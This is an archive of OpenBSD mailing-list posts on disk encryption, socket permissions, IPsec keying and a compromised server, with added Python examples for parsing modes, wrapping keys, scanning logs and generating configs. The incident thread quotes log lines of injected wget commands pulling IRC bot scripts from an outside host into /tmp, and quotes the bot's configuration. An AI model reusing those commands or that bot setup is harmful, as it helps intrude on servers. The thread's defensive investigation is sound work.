Re: CGD

2006-01-04 Thread Karl O. Pinc

On 02/04/2006 01:05:17 AM, veins wrote:

I think you are missing the point, cgd and salting are two different and

unrelated things. It's not because cgd isn't making it into OpenBSD,
that salting won't make it into svnd. I'd explain, but frankly after a
night at work i'd rather go and sleep while you google :-)


I know cgd and salting are two different things, but cgd salts
and svnd does not.  IMO, what the thread is about is the criticisms
that came up of svnd, compared with the goodness of CGD,
in the interview about CGD.  So, people are
suddenly wanting CGD...  Or maybe I am OT, it is late.  :)
The svnd salting patch did come up in the CGD thread, which
sorta changed the subject to whether or not svnd _should_ salt.

ps. tedu just said that he got no comments about his diff, if you really

think the idea is valuable, you should be testing the diff.


You are right.  But
another point of my post was to indicate that yes, tedu is right
in that most people _won't_ run CGD (or svnd) but people _still_
appreciate having the option open.  I, like IMO a lot of
people, have only enough interest to kibitz in the hope
of slowly collecting enough information to make an informed
choice should the time come to exercise the option.
The only apology I make regarding this aspect of
my post is cluttering up the list in the
hopes that what I say will make the people actually doing
the work feel appreciated rather than put-upon,
by pointing out that the clueless questions
are an indication of the large breadth (but not depth) of
desire for a crypto fs.  It seems tough working on something
complex a whole lot of people sorta think they want a
little bit.  Crypto fs seems to fit that bill
more than most. So in way of support I thought I'd
try to point this out and give encouragement.
Again, sorry if it's a distraction.

Regardless, thanks for hitting me with a clue-stick even if I did
not need it, because sometimes I do.  :-)

Karl [EMAIL PROTECTED]
Free Software:  You don't pay back, you pay forward.
 -- Robert A. Heinlein



Re: DadOS - sys shutdown with XDM

2006-01-04 Thread Dave Feustel
On Wednesday 04 January 2006 02:36, Otto Moerbeek wrote:
 
 On Tue, 3 Jan 2006, Dave Feustel wrote:
 
  On Tuesday 03 January 2006 17:50, Otto Moerbeek wrote:
   
   On Tue, 3 Jan 2006, Dave Feustel wrote:
   
On Tuesday 03 January 2006 17:11, J.C. Roberts wrote:

 The rule of thumb for granting privileges is simple; avoid granting
 permissions whenever possible.

Check the ownership/privileges on /tmp/.X11-unix/X0 after you start kde 
or Xorg.
   
   Come on, this is a unix domain socket, as has been pointed out before.
   You keep on repeating this nonsense. Having a world writable socket is
   not a problem in itself. X has its own authentication/authorization
   scheme, which is used both for unix domain sockets and tcp sockets. 
  
  I confess that I do not understand the ramifications of the world rw+suid
  permissions on this socket. I do wonder why this socket has world rw when 
  it seems to work equally well after I do a chmod 4700 on it at the 
  beginning 
  of every kde session. Do not the permissions applied to this socket violate 
  the principle of least privilege mentioned above?
 
 It does not have suid permissions. This clearly shows you understand
 little about permissions. Hint: it's a socket, starting with an 's'.
 
 The principle is not violated, because having the socket writable for
 others has its uses, maybe?
 
   -Otto
Otto,

I reread the man page for ls and I did indeed misread the documentation
as to what the 's' means here.  Thanks for pointing that out.

 50 srwxrwxrwx  1 daf  wheel  0 Jan  4 05:01 /tmp/.X11-unix/X0
 80 srwx------  1 daf  wheel  0 Jan  4 05:01 /tmp/.ICE-unix/dcop15166-1136368903
 90 srwx------  1 daf  wheel  0 Jan  4 05:01 /tmp/.ICE-unix/389


-- 
Lose, v., experience a loss, get rid of, lose the weight
Loose, adj., not tight, let go, free, loose clothing
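Decoding an ls(1) mode string such as the srwxrwxrwx shown above, as an added example that is not from the thread: the leading 's' is the file-type column (a socket), whereas a setuid bit would appear as an 's' in the owner-execute column, as in -rwsr-xr-x. Only Python's standard library stat module is used.

```python
import stat

# ls(1) file-type column -> stat(2) S_IFMT value
TYPE_CHARS = {
    "-": stat.S_IFREG, "d": stat.S_IFDIR, "l": stat.S_IFLNK, "s": stat.S_IFSOCK,
    "p": stat.S_IFIFO, "c": stat.S_IFCHR, "b": stat.S_IFBLK,
}
TYPE_NAMES = {
    stat.S_IFREG: "regular file", stat.S_IFDIR: "directory", stat.S_IFLNK: "symlink",
    stat.S_IFSOCK: "socket", stat.S_IFIFO: "fifo", stat.S_IFCHR: "char device",
    stat.S_IFBLK: "block device",
}


def parse_mode(mode_str: str) -> dict:
    """Turn a 10-character ls -l mode string into its st_mode components.

    Returns the file type name, the permission bits including the special
    bits (e.g. 0o4755), the full st_mode value, and which special bits
    (setuid, setgid, sticky) are set.
    """
    if len(mode_str) != 10:
        raise ValueError("expected 10 characters, e.g. 'srwxrwxrwx'")
    if mode_str[0] not in TYPE_CHARS:
        raise ValueError(f"unknown file type character {mode_str[0]!r}")
    ftype = TYPE_CHARS[mode_str[0]]
    perms = 0
    setuid = setgid = sticky = False
    triplets = (mode_str[1:4], mode_str[4:7], mode_str[7:10])
    for who, (r, w, x) in enumerate(triplets):   # who: 0=owner, 1=group, 2=other
        shift = 6 - 3 * who
        if r == "r":
            perms |= 4 << shift
        elif r != "-":
            raise ValueError(f"bad read flag {r!r}")
        if w == "w":
            perms |= 2 << shift
        elif w != "-":
            raise ValueError(f"bad write flag {w!r}")
        # The execute column carries the special bits: s/S for setuid (owner)
        # or setgid (group), t/T for sticky (other).  Lowercase means the
        # execute bit is also set; uppercase means it is not.
        if x in "xst":
            perms |= 1 << shift
        if x in "sS":
            if who == 0:
                setuid = True
            elif who == 1:
                setgid = True
            else:
                raise ValueError("'s' is not valid in the 'other' triplet")
        elif x in "tT":
            if who != 2:
                raise ValueError("'t' is only valid in the 'other' triplet")
            sticky = True
        elif x not in "x-":
            raise ValueError(f"bad execute flag {x!r}")
    if setuid:
        perms |= stat.S_ISUID
    if setgid:
        perms |= stat.S_ISGID
    if sticky:
        perms |= stat.S_ISVTX
    return {
        "type": TYPE_NAMES[ftype],
        "perms": perms,
        "st_mode": ftype | perms,
        "setuid": setuid,
        "setgid": setgid,
        "sticky": sticky,
    }


def explain(mode_str: str) -> str:
    """One-line summary, e.g. for the X0 socket listed in the thread."""
    info = parse_mode(mode_str)
    special = [k for k in ("setuid", "setgid", "sticky") if info[k]] or ["no special bits"]
    return f"{info['type']}, mode {info['perms']:04o}, {', '.join(special)}"


def roundtrip(mode_str: str) -> bool:
    """Cross-check against the standard library's own formatter."""
    return stat.filemode(parse_mode(mode_str)["st_mode"]) == mode_str


if __name__ == "__main__":
    # The two cases the thread confuses: a socket, and a genuinely setuid binary.
    print(explain("srwxrwxrwx"))   # socket, mode 0777, no special bits
    print(explain("-rwsr-xr-x"))   # regular file, mode 4755, setuid
```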



Re: CGD

2006-01-04 Thread knitti
On 1/4/06, Ted Unangst [EMAIL PROTECTED] wrote:
 On 1/3/06, knitti [EMAIL PROTECTED] wrote:
  cgd gives users some choice over how to build their encrypted partition.
  you're able to use different ciphers.
  in the unlikely case of a cipher getting broken, you have the possibility to
  switch instantly, using a tool you know with stable code and the same way
  you configured it.

 this is really not that useful.  why would you pick anything other
 than the best when setting it up?

because no one knows what the best is. blowfish appears to be the best
at the moment, because it's secure and fast. some other people don't like
block sizes of 64 bit. so perhaps they take aes, which is slightly slower
but encrypts blocks of 128 bit. is it for no reason, that swap encryption
uses aes over blowfish?

  and after it's setup, you can't
 change.  the idea that once a cipher is broken you could migrate is
 nice, but think about it.  are you equipping all your servers with
 double storage so that you can copy and reencrypt everything?  i doubt
 anyone has thought more than 10 seconds about what the migration
 procedure would really be.

a pain in the ass. but you can plan for it.

 anyway, it's not that hard to switch
 ciphers in svnd.  how critical is your timeframe?  can you wait 24
 hours to upgrade?

no one besides you (the developers) knows how quick an upgrade
would be possible. 24h _is_ really fast, and a week would probably
suffice too, for most people.  I think this rocks, but no one knew it
would be that fast.

  you're able to change your passphrase without reencrypting your container.

 not really, or at least not any more so than with svnd.

encrypting with your passphrase (as would be the easy way with svnd)
is using a weaker keyspace than encrypting with a generated key. but
you are right, that would be possible with svnd too.


--knitti
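An added example, not cgd's or svnd's code and a simplified scheme rather than either's on-disk format, for the two points raised in this thread: Karl's, that a salt makes the same passphrase yield a different key per volume, and knitti's, that keeping a random volume key wrapped under a passphrase-derived key lets you change the passphrase by re-wrapping a small header without re-encrypting the data. It uses only Python's standard library; PBKDF2-SHA256 stands in for the salted derivation, and a plain hash of the passphrase stands in for the unsalted case the thread attributes to svnd.

```python
import hashlib
import hmac
import os

VOLUME_KEY_LEN = 32      # the key that actually encrypts the disk (e.g. a 256-bit AES key)
SALT_LEN = 16
ITERATIONS = 100_000     # PBKDF2 work factor; slows down passphrase guessing


def unsalted_key(passphrase: str) -> bytes:
    """Key derived from the passphrase alone.  Two volumes with the same
    passphrase get the same key, and keys for common passphrases can be
    precomputed once and tried against every volume."""
    return hashlib.sha256(passphrase.encode()).digest()


def derive_keys(passphrase: str, salt: bytes) -> tuple:
    """Salted derivation: returns (wrap_key, mac_key), 32 bytes each."""
    okm = hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, ITERATIONS, 64)
    return okm[:32], okm[32:]


def wrap_volume_key(volume_key: bytes, passphrase: str) -> bytes:
    """Produce the header blob salt || wrapped_key || tag.

    The wrap is a one-time XOR with a key derived from a fresh salt, plus an
    HMAC so a wrong passphrase is rejected instead of yielding garbage.
    Every call draws a new salt, so a wrap key is never reused."""
    if len(volume_key) != VOLUME_KEY_LEN:
        raise ValueError("volume key must be 32 bytes")
    salt = os.urandom(SALT_LEN)
    wrap_key, mac_key = derive_keys(passphrase, salt)
    wrapped = bytes(a ^ b for a, b in zip(volume_key, wrap_key))
    tag = hmac.new(mac_key, salt + wrapped, "sha256").digest()
    return salt + wrapped + tag


def unwrap_volume_key(blob: bytes, passphrase: str) -> bytes:
    """Recover the volume key; raises ValueError on a wrong passphrase."""
    if len(blob) != SALT_LEN + VOLUME_KEY_LEN + 32:
        raise ValueError("malformed header")
    salt = blob[:SALT_LEN]
    wrapped = blob[SALT_LEN:SALT_LEN + VOLUME_KEY_LEN]
    tag = blob[SALT_LEN + VOLUME_KEY_LEN:]
    wrap_key, mac_key = derive_keys(passphrase, salt)
    expected = hmac.new(mac_key, salt + wrapped, "sha256").digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("wrong passphrase or corrupted header")
    return bytes(a ^ b for a, b in zip(wrapped, wrap_key))


def change_passphrase(blob: bytes, old: str, new: str) -> bytes:
    """Re-wrap the same volume key under a new passphrase.  Only the small
    header changes; the data encrypted under the volume key is untouched."""
    return wrap_volume_key(unwrap_volume_key(blob, old), new)


def passphrase_opens(blob: bytes, passphrase: str) -> bool:
    """True if the passphrase unwraps the header."""
    try:
        unwrap_volume_key(blob, passphrase)
        return True
    except ValueError:
        return False


def same_passphrase_same_key(passphrase: str) -> tuple:
    """(unsalted keys equal, salted keys equal) for two volumes set up with
    the same passphrase."""
    unsalted_equal = unsalted_key(passphrase) == unsalted_key(passphrase)
    k1, _ = derive_keys(passphrase, os.urandom(SALT_LEN))
    k2, _ = derive_keys(passphrase, os.urandom(SALT_LEN))
    return unsalted_equal, k1 == k2


if __name__ == "__main__":
    print(same_passphrase_same_key("correct horse"))          # (True, False)
    vk = os.urandom(VOLUME_KEY_LEN)
    hdr = wrap_volume_key(vk, "first passphrase")
    hdr = change_passphrase(hdr, "first passphrase", "second passphrase")
    print(unwrap_volume_key(hdr, "second passphrase") == vk)   # True
```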



Re: upgrading packages with pkg_add -u and pkg_add -r

2006-01-04 Thread z0mbix
On 1/3/06, Justin H Haynes [EMAIL PROTECTED] wrote:

 I really appreciate this work.  Until it is complete, here are a few
 quick and dirty things I do to make the upgrade process a little
 easier.  Probably common sense to many, but I'll share it all the same:

 https://justinhaynes.com/weblog/package-updates-in-openbsd-38/

 -Justin


This is good, but you should substitute:

uname -a | awk '{print $3}'

for

uname -r

and

uname -a | awk '{print $5}'

for

uname -m



Re: learning to code - suggestions needed

2006-01-04 Thread Luís Bruno

Edd Barrett wrote:
I'm taking a university degree that teaches unix system programming in 
solaris in the second year.


FWIW, here we scratch the surface too... But I was glad I read the knf 
manpage and some code reviews on this list. The c.l.c FAQ was also a 
very good resource.


On a tangent, comp.risks and Bruce Schneier should be required reading 
for anyone who's programming. It's less expensive to learn through 
others' mistakes.


So I guess this tells you to expect to do some learning on your own by 
using these and others' resources. I no longer think I could be 
competent just by going to school.


--
Luis disenchanted with school Bruno



Re: CGD

2006-01-04 Thread Marco Peereboom
  this is really not that useful.  why would you pick anything other
  than the best when setting it up?
 
 because no one knows what the best is. blowfish appears to be the best
 at the moment, because it's secure and fast. some other people don't like
 block sizes of 64 bit. so perhaps they take aes, which is slightly slower
 but encrypts blocks of 128 bit. is it for no reason, that swap encryption
 uses aes over blowfish?

If you really meant what you said you should let the people that write an OS
make that decision for you.

And just for everyone's entertainment, when was it the last time that you saw
swap being used?



How did they get here?

2006-01-04 Thread Gaby vanhegan
To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173  
i386.

I have some suspect files in /tmp, and I'm fairly sure that they  
shouldn't be there.  Only thing I can't twig is what method the  
attackers used to get the files into that directory.  The files are:

### Microsoft Search Worm - by br0k3d ###
# From the same author of LinuxDay Worm and other variants ###

And:

#  ShellBOT
#  0ldW0lf - [EMAIL PROTECTED]
#  - www.atrix-br.cjb.net
#  - www.atrix.cjb.net

in /tmp/.cpanel and /tmp/.cpanel.tmp.  Reading them through, they  
just look like IRC clients written in Perl that have some remote  
commands for DOS, and the likes.  They connect to a chatroom and  
print some message or other.  If anybody wants to have some fun, the  
main config block is:

# IRC
my @adms=("darkwoot", "br0k3d", "vipzen", "Nandokabala");   # admin nicks
my @canais=("#gestapo");
my $nick='ADOLFHITLER'; # bot nick.. if the nick is already in use, it shows up with a random number at the end
my $ircname = 'SSSA';
chop (my $realname = `uname -a`);
$servidor='irc.agitamanaus.net' unless $servidor;   # irc server to use if none is given as an argument
my $porta='6667';   # irc server port

My question is how did these files get into the machine.  I have  
entries in the httpd error log that look like this:

--05:10:47--  http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
=> `/tmp/.cpanel'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
HTTP request sent, awaiting response... --05:10:57--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
=> `/tmp/.cpanel.tmp'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed: Connection timed out.
Retrying.

--05:12:13--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
   (try: 2) => `/tmp/.cpanel.tmp'
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
Length: 3,355 [text/plain]

 0K ...   100%  468.05 KB/s

05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]

So something is clearly injecting a command into a script, and it is  
causing wget to run and fetch some files.  There are more instances  
of the same thing, but they're all fetching a file from the same  
place (either .cpanel, .cpanel.tmp or .plesk).

Because they're in the default Apache error log, the attacker must  
have hit a website on the machine that doesn't have an ErrorLog  
defined, or they hit the machine by IP instead of a hostname.  I got  
a list of sites that have no error log (and would log to /var/www/ 
logs/error_log) and checked their transfer logs.  None of them had  
any entries in them that correspond to any of the times on the wget  
entries, so I learn nothing from this.  There are earlier entries as  
well, doing the same thing, but to a different site.

I'm going to do a bulk grep on all the web server logs to see if  
anything about wget turns up in any of them, and if I can then work  
out which script on which site is causing the problem.  As far as I  
can tell, there is no damage, but there are some entries like these  
in the error logs:

/tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A8080^44: not found
/tmp/x44423[2]: 1?X89?8DT81^DP83??RQ??^A?: not found
/tmp/x44423[4]: syntax error: `(' unexpected

Am I right in thinking that these entries show somebody trying to run  
a Linux binary unsuccessfully?  Good job I leave Linux emulation  
turned off... :)

So, what's my next move?  My daily/weekly security emails show  
nothing to be worried about, no changes to any system critical files  
or anything of that ilk.  Where can I look for more information or  
clues?  I know the machine is due for an upgrade, and that's next on  
my list.  I would provide a dmesg but the machine has been up for a  
while with one full disk, so it's been pushed out of the end of the  
dmesg file.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
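The bulk grep described above, done as a small parser; this is an added example and not the poster's code. It walks Apache error-log lines, reconstructs each wget fetch (start time, URL, destination path, retry number, bytes saved) and flags lines where /bin/sh was handed an ELF binary, which is what the x44423 lines are. The sample log is constructed from the lines quoted in the post plus one ordinary Apache error line with a made-up client address.

```python
import re
from urllib.parse import urlparse

# wget(1) output as it lands in error_log when a CGI/PHP script spawns it
FETCH_START = re.compile(r"--(\d\d:\d\d:\d\d)--\s+(https?://\S+)")
FETCH_DEST = re.compile(r"(?:\(try:\s*(\d+)\)\s+)?=>\s+`([^']+)'")
FETCH_SAVED = re.compile(r"`([^']+)' saved \[(\d+)/(\d+)\]")
# /bin/sh fed an ELF file: "<path>[<line>]: ^?ELF...: not found"
# (literal "^?" as the post shows it, or the raw 0x7f byte in a real log)
EXEC_ATTEMPT = re.compile(r"^(\S+?)\[\d+\]:\s+(?:\^\?|\x7f)ELF")

# Constructed sample: the lines quoted in the post, plus one normal Apache
# error line with a made-up client address so the scanner has noise to skip.
SAMPLE_LOG = """\
[Wed Jan  4 05:10:40 2006] [error] [client 10.0.0.5] File does not exist: /var/www/htdocs/favicon.ico
--05:10:47--  http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
=> `/tmp/.cpanel'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
HTTP request sent, awaiting response... --05:10:57--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
=> `/tmp/.cpanel.tmp'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed: Connection timed out.
Retrying.

--05:12:13--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
  (try: 2) => `/tmp/.cpanel.tmp'
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
Length: 3,355 [text/plain]

05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]
/tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A8080^44: not found
/tmp/x44423[2]: 1?X89?8DT81^DP83??RQ??^A?: not found
/tmp/x44423[4]: syntax error: `(' unexpected
"""


def scan_error_log(lines):
    """Return {"fetches": [...], "exec_attempts": [...]} for an error log.

    Each fetch dict records time, url, dest (the local path wget wrote to),
    attempt number and bytes saved (None if the download never finished).
    """
    fetches, exec_attempts = [], []
    for line in lines:
        m = FETCH_START.search(line)   # search, not match: the marker can follow other output
        if m:
            fetches.append({"time": m.group(1), "url": m.group(2),
                            "dest": None, "attempt": 1, "saved": None})
            continue
        m = FETCH_DEST.search(line)
        if m:
            # a "=> `path'" line belongs to the latest fetch still lacking a dest
            target = next((f for f in reversed(fetches) if f["dest"] is None), None)
            if target is not None:
                target["dest"] = m.group(2)
                if m.group(1):
                    target["attempt"] = int(m.group(1))
            continue
        m = FETCH_SAVED.search(line)
        if m:
            for f in reversed(fetches):
                if f["dest"] == m.group(1):
                    f["saved"] = int(m.group(2))
                    break
            continue
        m = EXEC_ATTEMPT.match(line)
        if m and m.group(1) not in exec_attempts:
            exec_attempts.append(m.group(1))
    return {"fetches": fetches, "exec_attempts": exec_attempts}


def remote_hosts(report):
    """Distinct hosts the dropper pulled files from; candidates to block and alert on."""
    return sorted({urlparse(f["url"]).hostname for f in report["fetches"]})


def dropped_files(report):
    """Local paths that wget reported as fully saved."""
    return sorted({f["dest"] for f in report["fetches"] if f["saved"] is not None})


if __name__ == "__main__":
    rep = scan_error_log(SAMPLE_LOG.splitlines())
    for f in rep["fetches"]:
        print(f"{f['time']} {f['url']} -> {f['dest']} (try {f['attempt']}, saved={f['saved']})")
    print("remote hosts:", remote_hosts(rep))
    print("dropped files:", dropped_files(rep))
    print("binary exec attempts:", rep["exec_attempts"])
```

On a live box the same scanner runs over every ErrorLog, including the default /var/www/logs/error_log, so a fetch that landed in a vhost-specific log is not missed.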



Re: VPN packets not passing remote gateway [RESOLVED... sorta]

2006-01-04 Thread Jason Dixon

On Jan 4, 2006, at 9:32 AM, Håkan Olsson wrote:


On 4 jan 2006, at 05.57, Jason Dixon wrote:

After some gentle persuading by Adrian Close, I dropped ipsecadm  
and went back to automatic key exchange with isakmpd.  A quick  
configuration based on the east/west and all is good.  Same PF  
configuration, no changes there except for the addition of ISAKMP  
traffic.  Don't know what the problem was, although I'm sure it  
was user related.


Your manual setup only included one SA (SPI 0x100a), and you always  
need at least two, as an SA is unidirectional.


I tried that too before moving over to ISAKMP.  It was still behaving  
the same, but it was probably user error.



Thanks,

--
Jason Dixon
DixonGroup Consulting
http://www.dixongroup.net



Re: VPN packets not passing remote gateway [RESOLVED... sorta]

2006-01-04 Thread Will H. Backman


Here is the most simple manual keying setup I could make:
I can create a manually keyed host to host vpn with two lines in 
/etc/ipsec.conf
On the other host, just make sure to swap the IPs, spi numbers and the 
auth and enc keys.  The key values are for testing only.


flow esp from 192.168.71.129 to 192.168.71.128
esp from 192.168.71.129 to 192.168.71.128 spi 0x1000:0x1001 authkey 0x:0x0001 enckey 0x:0x0001
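An added example (not Will's or the project's code) that generates the two matching ipsec.conf(5) fragments for a manually keyed host-to-host ESP link and checks that they mirror each other: the colon-separated spi/authkey/enckey pairs are outbound:inbound, so each direction gets its own SA and its own key (the point made upthread that an SA is unidirectional), and the peer's file is the same rule with the IPs and both halves of every pair swapped. Assumed here: hmac-sha2-256 takes a 32-byte key and aes a 16-byte key, and `auth`/`enc` are the ipsec.conf transform keywords; verify the generated text with `ipsecctl -n -f` before loading it.

```python
import re
import secrets

# Assumed transform names and key sizes; check against ipsec.conf(5) on your release.
AUTH_ALG, AUTH_KEY_BYTES = "hmac-sha2-256", 32
ENC_ALG, ENC_KEY_BYTES = "aes", 16

ESP_LINE = re.compile(
    r"^esp from (\S+) to (\S+) spi (0x[0-9a-f]+):(0x[0-9a-f]+)"
    r" auth (\S+) enc (\S+)"
    r" authkey 0x([0-9a-f]+):0x([0-9a-f]+) enckey 0x([0-9a-f]+):0x([0-9a-f]+)$",
    re.MULTILINE,
)


def fresh_sa_keys() -> dict:
    """Random keys for ONE direction; never reuse keys pasted from a post."""
    return {"auth": secrets.token_hex(AUTH_KEY_BYTES),
            "enc": secrets.token_hex(ENC_KEY_BYTES)}


def render_host(local, peer, spi_out, spi_in, out_keys, in_keys) -> str:
    """ipsec.conf lines for one host: outbound value first in every pair, inbound second."""
    return (
        f"flow esp from {local} to {peer}\n"
        f"esp from {local} to {peer} spi {spi_out:#x}:{spi_in:#x}"
        f" auth {AUTH_ALG} enc {ENC_ALG}"
        f" authkey 0x{out_keys['auth']}:0x{in_keys['auth']}"
        f" enckey 0x{out_keys['enc']}:0x{in_keys['enc']}\n"
    )


def generate_pair(host_a, host_b, spi_ab=0x1000, spi_ba=0x1001):
    """Return (conf_for_a, conf_for_b).

    SA a->b is spi_ab with keys_ab, SA b->a is spi_ba with keys_ba; host B's
    file lists the same two SAs with the pairs swapped."""
    keys_ab, keys_ba = fresh_sa_keys(), fresh_sa_keys()
    conf_a = render_host(host_a, host_b, spi_ab, spi_ba, keys_ab, keys_ba)
    conf_b = render_host(host_b, host_a, spi_ba, spi_ab, keys_ba, keys_ab)
    return conf_a, conf_b


def parse_esp_line(conf: str) -> dict:
    """Pull the manual-keying esp rule back apart for checking."""
    m = ESP_LINE.search(conf)
    if not m:
        raise ValueError("no manual-keying esp line found")
    names = ("src", "dst", "spi_out", "spi_in", "auth", "enc",
             "authkey_out", "authkey_in", "enckey_out", "enckey_in")
    d = dict(zip(names, m.groups()))
    d["spi_out"], d["spi_in"] = int(d["spi_out"], 16), int(d["spi_in"], 16)
    return d


def mirrored(conf_a: str, conf_b: str) -> bool:
    """True when A's outbound SA is exactly B's inbound SA and vice versa,
    the two SAs are distinct, and key lengths fit the transforms."""
    a, b = parse_esp_line(conf_a), parse_esp_line(conf_b)
    return (
        a["src"] == b["dst"] and a["dst"] == b["src"]
        and a["spi_out"] == b["spi_in"] and a["spi_in"] == b["spi_out"]
        and a["spi_out"] != a["spi_in"]                     # two distinct SAs
        and a["authkey_out"] == b["authkey_in"] and a["authkey_in"] == b["authkey_out"]
        and a["enckey_out"] == b["enckey_in"] and a["enckey_in"] == b["enckey_out"]
        and a["authkey_out"] != a["authkey_in"]             # a key per direction
        and all(len(a[k]) == 2 * AUTH_KEY_BYTES for k in ("authkey_out", "authkey_in"))
        and all(len(a[k]) == 2 * ENC_KEY_BYTES for k in ("enckey_out", "enckey_in"))
    )


if __name__ == "__main__":
    conf_a, conf_b = generate_pair("192.168.71.129", "192.168.71.128")
    print("# host A /etc/ipsec.conf\n" + conf_a)
    print("# host B /etc/ipsec.conf\n" + conf_b)
    print("mirrored:", mirrored(conf_a, conf_b))   # True
```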




Re: How did they get here?

2006-01-04 Thread Pedro Martelletto
Looks like you've made some new friends in Manaus, Brazil :-)

-p.




Re: CGD

2006-01-04 Thread knitti
On 1/4/06, Marco Peereboom [EMAIL PROTECTED] wrote:
  because no one knows what the best is. blowfish appears to be the best
  at the moment, because it's secure and fast. some other people don't like
  block sizes of 64 bit. so perhaps they take aes, which is slightly slower
  but encrypts blocks of 128 bit. is it for no reason, that swap encryption
  uses aes over blowfish?

 If you really meant what you said you should let the people that write an OS
 make that decision for you.
apparently there is no such thing as a general best, only an application
specific. or do you suggest there is one? why would the developers then
decide to use blowfish for svnd and aes for swap?
as it looks, data in swap is more secure than on svnd. known plaintext attacks
are far more difficult, and no problem with replay attacks. why shouldn't I be
able to have this also for storage? if that's the decision by the developers,
I'd rather decide on my own.

 And just for everyone's entertainment, when was it the last time that you saw
 swap being used?
last year. five days ago.

--knitti



Re: How did they get here?

2006-01-04 Thread Pete Vickers

Hi,


Standard advice is to reinstall the o/s (3.8 ? ;-) and then _data_  
only from known good backup. You could use a boot cdrom & dd off an  
image of the disk for later analysis if you want first.


Is there some attack vector like php or such available on the  
machine ? maybe they used that to retrieve & write the file ? ... but  
access to /tmp is tricky from a chrooted httpd !



/Pete







Re: How did they get here?

2006-01-04 Thread eric
On Wed, 2006-01-04 at 14:50:01 +, Gaby vanhegan proclaimed...

 To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173  
 i386.
 
 I have some suspect files in /tmp, and I'm fairly sure that they  
 shouldn't be there.  Only thing I can't twig is what method the  
 attackers used to get the files into that directory.  The files are:

Is this doing any A/V scanning? You have told us nothing about the host in
question: is it an email gateway? DNS server? etc.



Re: How did they get here?

2006-01-04 Thread Gaby vanhegan
On 4 Jan 2006, at 15:51, Pete Vickers wrote:

 Standard advice is to reinstall the o/s (3.8 ? ;-) and then _data_  
 only from known good backup. You could use a boot cdrom & dd off an  
 image of the disk for later analysis if you want first.

It seems that the files have been uploaded, but they haven't actually  
caused any damage, or even been run.  Unfortunately, I don't have the  
resources to mount a full investigation.  Grep'ing every httpd log on  
the machine has produced no more information, but the fact that the  
actual wget output was in the httpd logs leads me to think that was  
the way in.

 Is there some attack vector like php or such available on the  
 machine ? maybe they used that to retrieve & write the file?

The messages in the log file indicate that they used some command  
injection in a script to call wget and download the files into /tmp.   
I'm fairly sure it was via a bad script, and I'm trying to locate  
which script was used, so far with no success.

 ... but access to /tmp is tricky from a chrooted httpd !

Legacy sites mean that we haven't tried to chroot apache yet.  I  
think it's probably time to bite the bullet and get this done :)

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/



Re: How did they get here?

2006-01-04 Thread Gaby vanhegan
On 4 Jan 2006, at 16:05, eric wrote:

 I have some suspect files in /tmp, and I'm fairly sure that they
 shouldn't be there.  Only thing I can't twig is what method the
 attackers used to get the files into that directory.  The files are:

 Is this doing any A/V scanning? You have told us nothing about the host in
 question: is it an email gateway? DNS server? etc.

It runs:

- qmail/spamassassin-spamd/openbsd-spamd/rblsmtpd
- stock apache/php 4.3.8

It does no AV scanning above and beyond what SpamAssassin provides.   
It does not run any DNS services.  I outlined my reasons why I  
thought it was a php/cgi script problem, being that the messages were  
found in the default httpd error logs.

Finally, here is a dmesg (thanks Josh :-)

OpenBSD 3.6 (GENERIC.MP) #173: Fri Sep 17 12:52:31 MDT 2004
 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP
cpu0: Intel Pentium III (GenuineIntel 686-class) 601 MHz
cpu0:  
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
MMX,FXSR,SSE
real mem  = 1073324032 (1048168K)
avail mem = 972726272 (949928K)
using 4278 buffers containing 53768192 bytes (52508K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(00) BIOS, date 07/15/99, BIOS32 rev. 0 @  
0xfdb50
apm0 at bios0: Power Management spec V1.2
apm0: AC on, battery charge unknown
pcibios0 at bios0: rev 2.1 @ 0xf/0x1
pcibios0: PCI BIOS has 8 Interrupt Routing table entries
pcibios0: PCI Interrupt Router at 000:07:0 (Intel 82371AB PIIX4 ISA  
rev 0x00)
pcibios0: PCI bus #1 is the last bus
bios0: ROM list: 0xc/0x8000
mainbus0: Intel MP Specification (Version 1.1) (INTEL440GX   )
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: apic clock running at 100 MHz
cpu1 at mainbus0: apid 1 (application processor)
cpu1: Intel Pentium III (GenuineIntel 686-class) 601 MHz
cpu1:  
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
SER,MMX,FXSR,SSE
mainbus0: bus 0 is type PCI
mainbus0: bus 1 is type PCI
mainbus0: bus 2 is type ISA
ioapic0 at mainbus0: apid 2 pa 0xfec0, version 11, 24 pins
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 Intel 82443BX AGP rev 0x03
ppb0 at pci0 dev 1 function 0 Intel 82443BX AGP rev 0x03
